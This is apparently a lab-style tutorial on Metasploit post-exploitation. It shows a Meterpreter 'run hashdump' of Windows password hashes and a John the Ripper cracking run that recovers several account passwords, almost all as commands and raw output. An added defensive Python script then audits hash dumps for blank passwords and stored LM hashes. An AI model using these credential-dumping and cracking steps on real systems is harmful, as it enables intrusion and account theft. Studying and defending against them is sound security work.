control – metasploit john the ripper

Once you gain a session, what can you do?

jtr_crack_fast

[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9377e3b56dfc42b558e6568c92c4d2dd...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:8064893404a6f026ca568218bc865d63:9ddc730aea3f980a7835df24ea17241a:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:481d4a0de46329f9e12716ebd82bb2f3:::
IUSR_TE-D12B242FF348:1004:b707ad3d3079aa8e453d8b073c04b55a:ff80b8a838a28f4dbec1fbcae6563bd8:::
IWAM_TE-D12B242FF348:1005:c9782c35f7b9947e2f83a8051aa6f1d0:7e7bb355dda1560973ba086b45b478ee:::
ASPNET:1006:22f5f4866f10502f0c19c47029cc7c60:f67b93aac3bf3576ca8f466883d5790a:::
Test:1022:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::

meterpreter >    (press Ctrl+Z to background the session)

y    (answer yes to the prompt)

> use auxiliary/analyze/jtr_crack_fast

msf auxiliary(jtr_crack_fast) > run

[*] Seeded the password database with 10 words...
guesses: 3  time: 0:00:00:04 DONE (Tue Jul 19 16:34:41 2011)  c/s: 31650K  trying: WOP1900 - ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably

Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:05 DONE (Tue Jul 19 16:34:47 2011)  c/s: 137705K  trying: ||V} - |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 13 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 10 password hashes with no different salts
[*] Output: (cred_1)
guesses: 0  time: 0:00:00:00 DONE (Tue Jul 19 16:34:47 2011)  c/s: 3846K  trying: 89093 - 89092
[*] Output: Loaded 13 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 9 password hashes with no different salts
guesses: 1  time: 0:00:00:12 DONE (Tue Jul 19 16:35:00 2011)  c/s: 38594K  trying: zworykin1900 - password1900
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: password         (cred_9)
guesses: 1  time: 0:00:00:05 DONE (Tue Jul 19 16:35:05 2011)  c/s: 92318K  trying: |||}
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 7 password hashes with no different salts
[*] Output: (cred_1)
guesses: 0  time: 0:00:00:00 DONE (Tue Jul 19 16:35:06 2011)  c/s: 2777K  trying: 89030 - 89092
[*] Output: Loaded 8 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 6 password hashes with no different salts
[+] Cracked: Administrator: (192.168.0.200:445)
[+] Cracked: Guest: (192.168.0.200:445)
[+] Cracked: Test:password (192.168.0.200:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) >
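
In the dump above, the accounts that cracked to an empty password carry the NT value 31d6cfe0d16ae931b73c59d7e0c089c0, and several accounts still have a real LM hash, which is what the LM DES pass works on. As an added example (not part of the original post), this Python audit reads lines in the same user:rid:lm:nt::: format and flags those two conditions; the sample accounts and their non-empty hash values are constructed.

```python
import re

# Well-known constants of the Windows SAM hash format (not specific to any host).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

def parse_pwdump(line):
    """Split one 'user:rid:lm:nt:::' line into a dict; raise ValueError if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("expected user:rid:lm:nt:::")
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or not HEX32.match(lm) or not HEX32.match(nt):
        raise ValueError("bad rid or hash field for %r" % user)
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt}

def audit(lines):
    """Return {user: [findings]} for accounts whose stored hashes show weak settings."""
    report = {}
    for line in lines:
        if not line.strip():
            continue
        rec = parse_pwdump(line)
        findings = []
        if rec["nt"] == EMPTY_NT:
            findings.append("blank password")
        if rec["lm"] != EMPTY_LM:
            findings.append("LM hash stored")
            # LM hashes each 7-character half separately; an empty second half
            # means the password is at most 7 characters long.
            if rec["lm"][16:] == EMPTY_LM[16:]:
                findings.append("password is 7 characters or fewer")
        if findings:
            report[rec["user"]] = findings
    return report

# Constructed sample input (made-up accounts and hash values).
SAMPLE = [
    "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "jdoe:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
    "kiosk:1003:0123456789abcdefaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    "ok_user:1004:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
]

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(user, "->", ", ".join(findings))
```

Windows stops storing LM hashes once the "Network security: Do not store LAN Manager hash value on next password change" policy is enabled and each password is changed afterwards.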
